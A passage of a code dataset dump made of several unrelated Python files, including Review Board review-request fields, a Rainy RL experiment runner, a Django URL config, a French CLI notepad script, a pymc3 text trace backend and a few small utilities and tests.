review_request=review_request,\n file_attachment=file_attachment))\n except Exception as e:\n logger.exception('Error when calling is_enabled_for with '\n 'FileAttachmentReviewUI %r: %s',\n review_ui, e)\n return False\n\n\nclass ScreenshotCaptionsField(BaseCaptionsField):\n \"\"\"Renders caption changes for screenshots.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription rendering\n stage. It is not, however, used for populating entries in\n ChangeDescription.\n \"\"\"\n\n field_id = 'screenshot_captions'\n label = _('Screenshot Captions')\n obj_map_attr = 'screenshots_by_id'\n model = Screenshot\n caption_object_field = 'screenshot'\n\n\nclass ScreenshotsField(BaseCommaEditableField):\n \"\"\"Renders removed or added screenshots.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription rendering\n stage. It is not, however, used for populating entries in\n ChangeDescription.\n \"\"\"\n\n field_id = 'screenshots'\n label = _('Screenshots')\n model = Screenshot\n\n\nclass TargetGroupsField(BuiltinFieldMixin, BaseModelListEditableField):\n \"\"\"The Target Groups field on a review request.\"\"\"\n\n field_id = 'target_groups'\n label = _('Groups')\n model = Group\n model_name_attr = 'name'\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.TargetGroupsFieldView'\n\n def render_item(self, group):\n \"\"\"Render an item from the list.\n\n Args:\n item (object):\n The item to render.\n\n Returns:\n unicode:\n The rendered item.\n \"\"\"\n return '%s' % (escape(group.get_absolute_url()),\n escape(group.name))\n\n\nclass TargetPeopleField(BuiltinFieldMixin, BaseModelListEditableField):\n \"\"\"The Target People field on a review request.\"\"\"\n\n field_id = 'target_people'\n label = _('People')\n model = User\n model_name_attr = 'username'\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.TargetPeopleFieldView'\n\n def render_item(self, user):\n \"\"\"Render an item from the list.\n\n Args:\n item (object):\n The item to render.\n\n Returns:\n unicode:\n The rendered item.\n \"\"\"\n extra_classes = ['user']\n\n if not user.is_active:\n extra_classes.append('inactive')\n\n return format_html(\n '{2}',\n local_site_reverse(\n 'user',\n local_site=self.review_request_details.local_site,\n args=[user]),\n ' '.join(extra_classes),\n user.username)\n\n\nclass CommitListField(ReviewRequestPageDataMixin, BaseReviewRequestField):\n \"\"\"The list of commits for a review request.\"\"\"\n\n field_id = 'commit_list'\n label = _('Commits')\n\n is_editable = False\n\n js_view_class = 'RB.ReviewRequestFields.CommitListFieldView'\n\n @cached_property\n def review_request_created_with_history(self):\n \"\"\"Whether the associated review request was created with history.\"\"\"\n return (\n self.review_request_details\n .get_review_request()\n .created_with_history\n )\n\n @property\n def should_render(self):\n \"\"\"Whether or not the field should be rendered.\n\n This field will only be rendered when the review request was created\n with history support. It is also hidden on the diff viewer page,\n because it substantially overlaps with the commit selector.\n \"\"\"\n from reviewboard.urls import diffviewer_url_names\n url_name = self.request.resolver_match.url_name\n\n return (self.value is not None and\n self.review_request_created_with_history and\n url_name not in diffviewer_url_names)\n\n @property\n def can_record_change_entry(self):\n \"\"\"Whether or not the field can record a change entry.\n\n The field can only record a change entry when the review request has\n been created with history.\n \"\"\"\n return self.review_request_created_with_history\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (review_request_details.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n reviewboard.diffviewer.models.diffset.DiffSet:\n The DiffSet associated with the review request or draft.\n \"\"\"\n return review_request_details.get_latest_diffset()\n\n def save_value(self, value):\n \"\"\"Save a value to the review request.\n\n This is intentionally a no-op.\n\n Args:\n value (reviewboard.diffviewer.models.diffset.DiffSet, unused):\n The current DiffSet\n \"\"\"\n pass\n\n def render_value(self, value):\n \"\"\"Render the field for the given value.\n\n Args:\n value (int):\n The diffset primary key.\n\n returns:\n django.utils.safestring.SafeText:\n The rendered value.\n \"\"\"\n if not value:\n return ''\n\n commits = list(\n DiffCommit.objects\n .filter(diffset_id=value)\n .order_by('id')\n )\n context = self._get_common_context(commits)\n context['commits'] = commits\n\n return render_to_string(\n template_name='reviews/commit_list_field.html',\n request=self.request,\n context=context)\n\n def has_value_changed(self, old_value, new_value):\n \"\"\"Return whether or not the value has changed.\n\n Args:\n old_value (reviewboard.diffviewer.models.diffset.DiffSet):\n The primary key of the :py:class:`~reviewboard.diffviewer.\n models.diffset.DiffSet` from the review_request.\n\n new_value (reviewboard.diffviewer.models.diffset.DiffSet):\n The primary key of the :py:class:`~reviewboard.diffviewer.\n models.diffset.DiffSet` from the draft.\n\n Returns:\n bool:\n Whether or not the value has changed.\n \"\"\"\n return new_value is not None\n\n def record_change_entry(self, changedesc, old_value, new_value):\n \"\"\"Record the old and new values for this field into the changedesc.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the change into.\n\n old_value (reviewboard.diffviewer.models.diffset.DiffSet):\n The previous :py:class:`~reviewboard.diffviewer.models.\n diffset.DiffSet` from the review request.\n\n new_value (reviewboard.diffviewer.models.diffset.DiffSet):\n The new :py:class:`~reviewboard.diffviewer.models.diffset.\n DiffSet` from the draft.\n \"\"\"\n changedesc.fields_changed[self.field_id] = {\n 'old': old_value and old_value.pk,\n 'new': new_value.pk,\n }\n\n def render_change_entry_html(self, info):\n \"\"\"Render the change entry HTML for this field.\n\n Args:\n info (dict):\n The change entry info for this field. See\n :py:meth:`record_change_entry` for the format.\n\n Returns:\n django.utils.safestring.SafeText:\n The rendered HTML.\n \"\"\"\n commits = self.data.commits_by_diffset_id\n\n if info['old']:\n old_commits = commits[info['old']]\n else:\n old_commits = []\n\n new_commits = commits[info['new']]\n\n context = self._get_common_context(chain(old_commits, new_commits))\n context.update({\n 'old_commits': old_commits,\n 'new_commits': new_commits,\n })\n\n return render_to_string(\n template_name='reviews/changedesc_commit_list.html',\n request=self.request,\n context=context)\n\n def serialize_change_entry(self, changedesc):\n \"\"\"Serialize the changed field entry for the web API.\n\n Args:\n changdesc (reviewboard.changedescs.models.ChangeDescription):\n The change description being serialized.\n\n Returns:\n dict:\n A JSON-serializable dictionary representing the change entry for\n this field.\n \"\"\"\n info = changedesc.fields_changed[self.field_id]\n\n commits_by_diffset_id = DiffCommit.objects.by_diffset_ids(\n (info['old'], info['new']))\n\n return {\n key: [\n {\n 'author': commit.author_name,\n 'summary': commit.summary,\n }\n for commit in commits_by_diffset_id[info[key]]\n ]\n for key in ('old', 'new')\n }\n\n def _get_common_context(self, commits):\n \"\"\"Return common context for rending both change entries and the field.\n\n Args:\n commits (iterable of reviewboard.diffviewer.models.diffcommit.\n DiffCommit):\n The commits to generate context for.\n\n Returns:\n dict:\n A dictionary of context.\n \"\"\"\n submitter_name = self.review_request_details.submitter.get_full_name()\n include_author_name = not submitter_name\n to_expand = set()\n\n for commit in commits:\n if commit.author_name != submitter_name:\n include_author_name = True\n\n if commit.summary.strip() != commit.commit_message.strip():\n to_expand.add(commit.pk)\n\n return {\n 'include_author_name': include_author_name,\n 'to_expand': to_expand,\n }\n\n\nclass MainFieldSet(BaseReviewRequestFieldSet):\n fieldset_id = 'main'\n field_classes = [\n SummaryField,\n DescriptionField,\n TestingDoneField,\n ]\n\n\nclass ExtraFieldSet(BaseReviewRequestFieldSet):\n \"\"\"A field set that is displayed after the main field set.\"\"\"\n\n fieldset_id = 'extra'\n field_classes = [\n CommitListField,\n ]\n\n\nclass InformationFieldSet(BaseReviewRequestFieldSet):\n fieldset_id = 'info'\n label = _('Information')\n field_classes = [\n OwnerField,\n RepositoryField,\n BranchField,\n BugsField,\n DependsOnField,\n BlocksField,\n ChangeField,\n CommitField,\n ]\n\n\nclass ReviewersFieldSet(BaseReviewRequestFieldSet):\n fieldset_id = 'reviewers'\n label = _('Reviewers')\n show_required = True\n field_classes = [\n TargetGroupsField,\n TargetPeopleField,\n ]\n\n\nclass ChangeEntryOnlyFieldSet(BaseReviewRequestFieldSet):\n fieldset_id = '_change_entries_only'\n field_classes = [\n DiffField,\n FileAttachmentCaptionsField,\n ScreenshotCaptionsField,\n FileAttachmentsField,\n ScreenshotsField,\n StatusField,\n ]\n\n\nbuiltin_fieldsets = [\n MainFieldSet,\n ExtraFieldSet,\n InformationFieldSet,\n ReviewersFieldSet,\n ChangeEntryOnlyFieldSet,\n]\n","repo_name":"reviewboard/reviewboard","sub_path":"reviewboard/reviews/builtin_fields.py","file_name":"builtin_fields.py","file_ext":"py","file_size_in_byte":53601,"program_lang":"python","lang":"en","doc_type":"code","stars":1513,"dataset":"github-code","pt":"34"} +{"seq_id":"32255634732","text":"\"\"\"\nUnit testing palindromes using Pytest\n\nLearning from: https://www.tutorialspoint.com/pytest/pytest_tutorial.pdf\n\nRemember:\n - Testing function names must start by test*\n\"\"\"\n\nimport pytest\nimport random\nfrom main import *\n\n\n\ndef testValidRanges():\n\t# Ranges must be valid, ie end always > initial\n\t\n\tfor initial in range(1000):\n\t\tend = random.randint(0, 1000)\t\n\t\tfnResult = generatePalindromes(initial, end)\n\t\tif initial < end:\n\t\t\tassert fnResult[2] == \"Valid Range\", \"Fails with initial:\" + str(initial) + \", end:\" + str(end)\n\t\telse:\n\t\t\tassert fnResult[2] == \"Invalid Range\", \"Fails with initial:\" + str(initial) + \", end:\" + str(end)\n\ndef testUpperLowerLimits():\n\t# Includes both upper and lower limits\n\tassert generatePalindromes(100, 101) == [[101], 1, \"Valid Range\"], \"Fails to include upper limit\"\n\tassert generatePalindromes(101, 102) == [[101], 1, \"Valid Range\"], \"Fails to include lower limit\"\n\t\ndef testSomePalindromes():\n\t# Testing some palindromes\n\t\n\tpalindromes = [109901, 9999999, 1, 44, 1001001, 400004, 313]\n\t\n\tfor element in palindromes:\n\t\tfnResult = generatePalindromes(element, element+1)\n\t\tassert fnResult[0][0] == element, \"failed at \" + str(fnResult)\n","repo_name":"iagovar/openbootcamp","sub_path":"99 Reto Python/0 numerosDelReves/palindromes_test.py","file_name":"palindromes_test.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32172513731","text":"import warnings\nfrom pathlib import Path\nfrom typing import List, Optional\n\nimport click\n\nfrom .agents import Agent, DQNLikeAgent, DQNLikeParallel, EpisodeResult\nfrom .lib.mpi import IS_MPI_ROOT\nfrom .prelude import DEFAULT_SAVEFILE_NAME\n\n\nclass Experiment:\n def __init__(\n self,\n ag: Agent,\n save_file_name: Optional[str] = None,\n ) -> None:\n if isinstance(ag, DQNLikeAgent) and ag.config.nworkers > 1:\n self.ag = DQNLikeParallel(ag)\n else:\n self.ag = ag\n self.logger = ag.logger\n self.config = ag.config\n self.logger.summary_setting(\n \"train\",\n [\"episodes\", \"total_steps\", \"update_steps\"],\n interval=ag.config.episode_log_freq,\n color=\"red\",\n )\n self.logger.summary_setting(\n \"eval\",\n [\"total_steps\", \"update_steps\"],\n interval=ag.config.eval_times,\n color=\"green\",\n )\n self._save_file_name = save_file_name or DEFAULT_SAVEFILE_NAME\n self._has_eval_parallel = hasattr(self.ag, \"eval_parallel\")\n self.episode_offset = 0\n self.config.initialize_hooks()\n self.noeval = False\n\n def log_episode(self, episodes: int, results: List[EpisodeResult]) -> None:\n for i, res in enumerate(results):\n self.logger.submit(\n \"train\",\n episodes=episodes + i + self.episode_offset,\n total_steps=self.ag.total_steps,\n update_steps=self.ag.update_steps,\n return_=res.return_,\n length=res.length,\n )\n\n def log_eval(self, episodes: int, eval_render: bool = False) -> None:\n if self.noeval:\n self._msg(\"Do not run evaluation since noeval=True\")\n return\n\n results = self._eval_impl(render=eval_render)\n for res in results:\n self.logger.submit(\n \"eval\",\n total_steps=self.ag.total_steps,\n update_steps=self.ag.update_steps,\n return_=res.return_,\n length=res.length,\n )\n\n @staticmethod\n def _has_period(turn: int, width: int, freq: Optional[int]) -> bool:\n return freq and turn != 0 and turn // freq != (turn - width) // freq\n\n def _save(self, suffix: str = \"\") -> None:\n self.ag.save(self._save_file_name + suffix, self.logger.logdir)\n\n def _msg(self, msg: str, fg: str = \"black\", error: bool = False) -> None:\n click.secho(\"☔ \" + msg + \" ☔\", bg=\"white\", fg=fg, err=error)\n\n def abort(self, msg: str) -> None:\n self._msg(msg, fg=\"red\", error=True)\n self.ag.close()\n\n def switch_agent(self, new_ag: Agent, load: bool = False) -> Agent:\n new_ag.logger = self.logger\n new_ag.total_steps = self.ag.total_steps\n old_ag = self.ag\n self.ag = new_ag\n self._load_agent(self.logger.logdir)\n return old_ag\n\n def train(\n self,\n saveid_start: int = 0,\n eval_render: bool = False,\n pretrained_agent_path: Optional[str] = None,\n ) -> None:\n if not self.logger.ready:\n self.logger.setup_logdir()\n logdir = self.logger.logdir.as_posix()\n self._msg(f\"Train started (Logdir: {logdir})\")\n\n if pretrained_agent_path is not None:\n if self._load_agent(Path(pretrained_agent_path)) is None:\n self.abort(f\"{pretrained_agent_path} does not exist!\")\n return\n else:\n self._msg(f\"Loaded {pretrained_agent_path} before training\")\n\n episodes = 0\n steps = 0\n save_id = saveid_start\n\n for res in self.ag.train_episodes(self.config.max_steps):\n ep_len = len(res)\n if ep_len > 0 and IS_MPI_ROOT:\n self.log_episode(episodes, res)\n episodes += ep_len\n step_diff = self.ag.total_steps - steps\n steps = self.ag.total_steps\n\n if not IS_MPI_ROOT:\n continue\n\n # Evaluate the agent\n if self._has_period(steps, step_diff, self.config.eval_freq):\n self.log_eval(episodes, eval_render)\n # Save models\n if self._has_period(steps, step_diff, self.config.save_freq):\n self._save(suffix=\".{}\".format(save_id))\n save_id += 1\n\n self.log_eval(episodes, eval_render)\n self._save()\n self.ag.close()\n\n def _eval_impl(\n self,\n render: bool = False,\n replay: bool = False,\n pause: bool = False,\n ) -> List[EpisodeResult]:\n n = self.config.eval_times\n self.ag.set_mode(train=False)\n if self._has_eval_parallel and not (render or replay) and n > 1:\n res = self.ag.eval_parallel(n) # type: ignore\n else:\n res = [self.ag.eval_episode(render=render, pause=pause) for _ in range(n)]\n self.ag.set_mode(train=True)\n return res\n\n def _load_agent(self, logdir_or_file: Path) -> Path:\n if not logdir_or_file.exists():\n return None\n if logdir_or_file.is_file():\n fullpath = logdir_or_file\n else:\n fullpath = logdir_or_file.joinpath(self._save_file_name)\n if self.ag.load(fullpath):\n return fullpath\n else:\n raise ValueError(f\"Failed to load {fullpath}\")\n\n def _retrain_impl(self, additional_steps: int, eval_render: bool = False) -> None:\n self.ag.config.max_steps += additional_steps\n self.ag.initialize_rollouts()\n save_files = list(self.logger.logdir.glob(self._save_file_name + \".*\"))\n if len(save_files) > 0:\n save_id = len(save_files)\n else:\n save_id = 0\n self.train(save_id, eval_render)\n\n def retrain(\n self,\n logdir_or_file: str,\n additional_steps: int = 100,\n eval_render: bool = False,\n ) -> None:\n agent_file = self._load_agent(Path(logdir_or_file))\n if agent_file is None:\n self.abort(f\"{logdir_or_file} does not exist!\")\n return\n self._msg(f\"Loaded {agent_file} for re-training\")\n total_steps, episodes = self.logger.retrive(agent_file.parent)\n self.ag.total_steps = total_steps\n self.episode_offset = episodes\n self._retrain_impl(eval_render)\n\n def evaluate(\n self,\n render: bool = False,\n replay: bool = False,\n pause: bool = False,\n ) -> None:\n result = self._eval_impl(render, replay, pause)\n click.secho(\"====== Results ======\", bg=\"cyan\", fg=\"black\")\n if len(result) == 0:\n click.echo(result[0])\n else:\n from rainy.utils import LogStore\n\n eval_log = LogStore()\n for res in result:\n eval_log.submit(dict(rewards=res.return_, length=res.length))\n df = eval_log.into_df()\n click.echo(df)\n click.secho(\"====== Summary ======\", bg=\"cyan\", fg=\"black\")\n click.echo(df.describe())\n if render:\n click.pause(\"---Press any key to exit---\")\n if replay:\n try:\n self.config.eval_env.unwrapped.replay()\n except Exception:\n warnings.warn(\"This environment does not support replay\")\n self.ag.close()\n\n def load_and_evaluate(\n self,\n logdir_or_file: str,\n render: bool = False,\n replay: bool = False,\n pause: bool = False,\n ) -> None:\n agent_file = self._load_agent(Path(logdir_or_file))\n if agent_file is None:\n self.abort(f\"{logdir_or_file} does not exist!\")\n return\n self._msg(f\"Loaded {agent_file} for evaluation\")\n self.evaluate(render=render, replay=replay, pause=pause)\n\n def random(\n self,\n render: bool = False,\n replay: bool = False,\n pause: bool = False,\n ) -> None:\n res = self.ag.random_episode(render=render, pause=pause)\n click.echo(res)\n if render:\n click.pause(\"---Press any key to exit---\")\n if replay:\n try:\n self.config.eval_env.unwrapped.replay()\n except Exception:\n warnings.warn(\"This environment does not support replay\")\n self.ag.close()\n","repo_name":"kngwyu/Rainy","sub_path":"rainy/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":8372,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"34"} +{"seq_id":"14808297424","text":"\"\"\"expense_manager URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\n# from owner.views import OwnerViewSet\nfrom transaction.views import *\nfrom сategory.views import *\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('auth/', include('djoser.urls')),\n path('auth/', include('djoser.urls.authtoken')),\n path('api/v1/transaction_delete/', TransactionAPIDestroy.as_view()),\n path('api/v1/transaction/', TransactionAPIList.as_view()),\n path('api/v1/transaction/', TransactionAPIUpdate.as_view()),\n path('api/v1/category/', CategoryAPIList.as_view()),\n path('api/v1/category/', CategoryAPIUpdate.as_view()),\n path('api/v1/category_delete/', CategoryAPIDestroy.as_view()),\n # path('api/v1/ownerslist/', OwnerViewSet.as_view({\"get\": \"list\"})),\n # path('api/v1/ownerslist/', OwnerViewSet.as_view({\"put\": \"update\"})),\n # path('api/v1/', include(router.urls)), # http://127.0.0.1:8000/api/v1/category/\n\n]\n","repo_name":"ElenaVolchkova/expense_manager","sub_path":"expense_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25475258387","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\nimport os, sys, getpass\nfrom datetime import date, datetime\n\n####################################################################################################\n### blocpad.py - bloc-note en mode CLI et discussion sur LAN\n### mai 2022 - sous License MIT - par MEYER Daniel pour Linux, Mac et Windows.\n####################################################################################################\n### contact : meyer.daniel67@protonmail.com OU https://t.me/dnl_85\n### dépôt : https://github.com/dnl-85/blocpad_py\n####################################################################################################\n\n# fonction principale appelée au lancement du script\n# lors de l'appel depuis un CLI, il faudra spécifié le mode et le fichier à lire, à surveiller ou\n# à modifier\ndef main(option):\n datas = option[2]\n if \"-r\" in option: lire(datas)\n elif \"-w\" in option: ajout(datas)\n elif \"-s\" in option: surveille(datas)\n elif \"-d\" in option: discussion(datas)\n else: print (\"... option(s) inconnue(s)...\")\n exit()\n\n# fonction permettant la lecture du fichier spécifié en option\n# par exemple : python3 blocpad.py -r note.txt\n# va lancer le script en mode lecture et lire le fichier note.txt\ndef lire(datas):\n try:\n with open(datas, \"r\") as fichier:\n contenu = fichier.read()\n print (f\"\\n{contenu}\\n\")\n exit()\n except:\n print(\"le fichier spécifié n'existe pas !\")\n\n# fonction permettant l'écriture d'une note dans le fichier spécifié en option\n# par exemple : python3 blocpad.py -w note.txt\n# va lancer le script en mode ajout et enregistrer la note saisie dans le fichier spécifié\ndef ajout(datas):\n message = input(\" > \")\n if message != \"\":\n message = f\"{horodatage()} : {message} \\n\"\n with open(datas, \"a\") as fichier:\n fichier.write(message)\n exit()\n else:\n exit()\n\n# fonction permettant la lecture à interval régulier du fichier spécifié en option\n# par exemple : python3 blocpad.py -s note.txt\n# va lancer le script en mode surveillance et relire le fichier note.txt toutes les 20 secondes\n# à noter que ce mode ne lit que les 10 dernières lignes du fichier spécifié\ndef surveille(datas):\n while True:\n try:\n os.system(\"clear\")\n try:\n with open(datas, \"r\") as fichier:\n try:\n contenu = fichier.readlines()[-10:]\n for x in contenu:\n print(x.replace(\"\\n\", \"\"))\n except:\n contenu = fichier.read()\n print(f\"\\n{contenu}\")\n finally:\n print(f\"\\n... EN ATTENTE ... dernier accès : {horodatage()}\")\n print(f\"... Ctrl-Z pour terminer et revenir au Terminal ...\")\n os.system(\"sleep 20\")\n surveille(datas)\n except:\n print(\"le fichier spécifié n'existe pas !\")\n break\n except KeyboardInterrupt:\n print(\"... FIN DE L'ECHANGE ...\")\n\n# fonction permettant l'écriture dans le fichier spécifié en option, sans sortir du programme\n# par exemple : python3 blocpad.py -d note.txt\n# va lancer le script en mode discussion et permet de rajouter du contenu au fichier tant que\n# l'invite de saisie (input) n'est pas vide. si l'invite est vide, le script s'arrête\ndef discussion(datas):\n os.system(\"clear\")\n print(\"... EN MODE DISCUSSION ...\")\n print(\"... laisser le champs de saisie libre et appuyer sur Entrée pour finir !\")\n message = input(\" > \")\n if message != \"\":\n message = f\"{horodatage()} : {message} \\n\"\n with open(datas, \"a\") as fichier:\n fichier.write(message)\n discussion(datas)\n else:\n exit()\n\n# fonction permettant simplement de concaténer une ligne regroupant le nom de l'utilisateur du pc\n# utilisé, le jour et l'heure\ndef horodatage():\n jour = date.today()\n heure = datetime.now()\n login = getpass.getuser()\n moment = login + \" - \" + jour.strftime(\"%d/%m/%Y\") + \" - \" + heure.strftime(\"%H:%M:%S\")\n return moment\n\n####################################################################################################\n### lancement du programme...\n####################################################################################################\"\nmain(sys.argv)\n","repo_name":"dnl-85/blocpad_py","sub_path":"blocpad.py","file_name":"blocpad.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13709607274","text":"\nfrom urllib.parse import urlparse\nfrom handler import Handler\nimport os\nimport requests\nfrom job_handler import submitJob\n\nclass GatherPodLogs(Handler):\n def __init__(self):\n Handler.__init__(self,\"/gather-extra/artifacts/pods\")\n\n def getFileParts(self,url):\n partsDef = {\n 'namespace': None,\n 'podName': None,\n 'container': None,\n 'previous': False\n }\n \n logFileName = url.rsplit('/', 1)[-1]\n \n parts = logFileName.split('_')\n \n if len(parts) < 3:\n return partsDef\n partsDef['namespace'] = parts[0]\n partsDef['podName'] = parts[1]\n partsDef['container'] = parts[2]\n if len(parts)>=4:\n partsDef['previous'] = parts[3] == 'previous'\n return partsDef \n\n def downloadFile(self,parts, url):\n path = 'out/namespaces/'+ \\\n parts['namespace']+ \\\n '/pods/'+ \\\n parts['podName']+'/' +\\\n parts['container']+'/' +\\\n parts['container']+'/logs/'\n\n if os.path.exists(path) == False:\n os.makedirs(path)\n\n outPath = \"\"\n if parts['previous']: \n outPath = os.path.join(path,\"previous.log\")\n else:\n outPath = os.path.join(path,\"current.log\")\n \n r = requests.get(url)\n\n print(\"Saving pod log [\"+outPath+\"]\")\n with open(outPath, 'wb') as f:\n f.write(r.content) \n \n def handle(self,url): \n if url.endswith(\".log\") == False:\n return \n \n parts = self.getFileParts (os.path.splitext(url)[0])\n if parts['namespace'] == None or \\\n parts['podName'] == None or \\\n parts['container'] == None:\n return\n \n submitJob(self.downloadFile, parts, url)\n\n","repo_name":"rvanderp3/prow-adapter","sub_path":"gather_pod_logs.py","file_name":"gather_pod_logs.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"37347374247","text":"\"\"\"Text file trace backend\n\nStore sampling values as CSV files.\n\nFile format\n-----------\n\nSampling values for each chain are saved in a separate file (under a\ndirectory specified by the `name` argument). The rows correspond to\nsampling iterations. The column names consist of variable names and\nindex labels. For example, the heading\n\n x,y__0_0,y__0_1,y__1_0,y__1_1,y__2_0,y__2_1\n\nrepresents two variables, x and y, where x is a scalar and y has a\nshape of (3, 2).\n\"\"\"\nfrom glob import glob\nimport os\nimport pandas as pd\n\nfrom ..backends import base, ndarray\nfrom . import tracetab as ttab\nfrom ..theanof import floatX\n\n\nclass Text(base.BaseTrace):\n \"\"\"Text trace object\n\n Parameters\n ----------\n name : str\n Name of directory to store text files\n model : Model\n If None, the model is taken from the `with` context.\n vars : list of variables\n Sampling values will be stored for these variables. If None,\n `model.unobserved_RVs` is used.\n test_point : dict\n use different test point that might be with changed variables shapes\n \"\"\"\n\n def __init__(self, name, model=None, vars=None, test_point=None):\n if not os.path.exists(name):\n os.mkdir(name)\n super().__init__(name, model, vars, test_point)\n\n self.flat_names = {v: ttab.create_flat_names(v, shape)\n for v, shape in self.var_shapes.items()}\n\n self.filename = None\n self._fh = None\n self.df = None\n\n # Sampling methods\n\n def setup(self, draws, chain):\n \"\"\"Perform chain-specific setup.\n\n Parameters\n ----------\n draws : int\n Expected number of draws\n chain : int\n Chain number\n \"\"\"\n if self._fh is not None:\n self._fh.close()\n\n self.chain = chain\n self.filename = os.path.join(self.name, 'chain-{}.csv'.format(chain))\n\n cnames = [fv for v in self.varnames for fv in self.flat_names[v]]\n\n if os.path.exists(self.filename):\n with open(self.filename) as fh:\n prev_cnames = next(fh).strip().split(',')\n if prev_cnames != cnames:\n raise base.BackendError(\n \"Previous file '{}' has different variables names \"\n \"than current model.\".format(self.filename))\n self._fh = open(self.filename, 'a')\n else:\n self._fh = open(self.filename, 'w')\n self._fh.write(','.join(cnames) + '\\n')\n\n def record(self, point):\n \"\"\"Record results of a sampling iteration.\n\n Parameters\n ----------\n point : dict\n Values mapped to variable names\n \"\"\"\n vals = {}\n for varname, value in zip(self.varnames, self.fn(point)):\n vals[varname] = value.ravel()\n columns = [str(val) for var in self.varnames for val in vals[var]]\n self._fh.write(','.join(columns) + '\\n')\n\n def close(self):\n if self._fh is not None:\n self._fh.close()\n self._fh = None # Avoid serialization issue.\n\n # Selection methods\n\n def _load_df(self):\n if self.df is None:\n self.df = pd.read_csv(self.filename)\n for key, dtype in self.df.dtypes.iteritems():\n if \"float\" in str(dtype):\n self.df[key] = floatX(self.df[key])\n\n\n def __len__(self):\n if self.filename is None:\n return 0\n self._load_df()\n return self.df.shape[0]\n\n def get_values(self, varname, burn=0, thin=1):\n \"\"\"Get values from trace.\n\n Parameters\n ----------\n varname : str\n burn : int\n thin : int\n\n Returns\n -------\n A NumPy array\n \"\"\"\n self._load_df()\n var_df = self.df[self.flat_names[varname]]\n shape = (self.df.shape[0],) + self.var_shapes[varname]\n vals = var_df.values.ravel().reshape(shape)\n return vals[burn::thin]\n\n def _slice(self, idx):\n if idx.stop is not None:\n raise ValueError('Stop value in slice not supported.')\n return ndarray._slice_as_ndarray(self, idx)\n\n def point(self, idx):\n \"\"\"Return dictionary of point values at `idx` for current chain\n with variables names as keys.\n \"\"\"\n idx = int(idx)\n self._load_df()\n pt = {}\n for varname in self.varnames:\n vals = self.df[self.flat_names[varname]].iloc[idx].values\n pt[varname] = vals.reshape(self.var_shapes[varname])\n return pt\n\n\ndef load(name, model=None):\n \"\"\"Load Text database.\n\n Parameters\n ----------\n name : str\n Name of directory with files (one per chain)\n model : Model\n If None, the model is taken from the `with` context.\n\n Returns\n -------\n A MultiTrace instance\n \"\"\"\n files = glob(os.path.join(name, 'chain-*.csv'))\n\n if len(files) == 0:\n raise ValueError('No files present in directory {}'.format(name))\n\n straces = []\n for f in files:\n chain = int(os.path.splitext(f)[0].rsplit('-', 1)[1])\n strace = Text(name, model=model)\n strace.chain = chain\n strace.filename = f\n straces.append(strace)\n return base.MultiTrace(straces)\n\n\ndef dump(name, trace, chains=None):\n \"\"\"Store values from NDArray trace as CSV files.\n\n Parameters\n ----------\n name : str\n Name of directory to store CSV files in\n trace : MultiTrace of NDArray traces\n Result of MCMC run with default NDArray backend\n chains : list\n Chains to dump. If None, all chains are dumped.\n \"\"\"\n if not os.path.exists(name):\n os.mkdir(name)\n if chains is None:\n chains = trace.chains\n\n for chain in chains:\n filename = os.path.join(name, 'chain-{}.csv'.format(chain))\n df = ttab.trace_to_dataframe(\n trace, chains=chain, include_transformed=True)\n df.to_csv(filename, index=False)\n","repo_name":"manuwhs/Trapyng","sub_path":"Examples/5.2 HBM/pymc3-master/pymc3/backends/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"34"} +{"seq_id":"70532468258","text":"import os, traceback, openpyxl, phonenumbers\n\n# rowsCount - Get last row index (As sheet.max_row is not calculating correctly, doing it manually)\ndef rowsCount(sheet):\n maxRow = 1\n\n # Traverse reversely and check if any record is not empty (which is the last record)\n for row in range(sheet.max_row, 0, -1):\n if any(cell.value is not None for cell in sheet[row]):\n maxRow = row\n break\n\n return maxRow\n\n# rowsCount\n\n# validateMobileNumber\ndef validateMobileNumber(excelFilePath, mobileNoColumnIndex):\n wb = openpyxl.load_workbook(excelFilePath)\n sheet = wb.active\n\n rowsCountBeforeDelete = rowsCount(sheet)\n rowsToDelete = []\n\n # iterate rows\n for row in range(2, rowsCountBeforeDelete + 1):\n mobileNo = sheet.cell(row, mobileNoColumnIndex).value\n isValid = False\n\n if mobileNo:\n print(f'Validating {mobileNo} at row: {row} ...')\n\n try:\n res = phonenumbers.parse(mobileNo)\n\n if res and phonenumbers.is_valid_number(res):\n mobileNoType = phonenumbers.number_type(res)\n\n # Allow only mobile numbers\n if mobileNoType == phonenumbers.PhoneNumberType.MOBILE or mobileNoType == 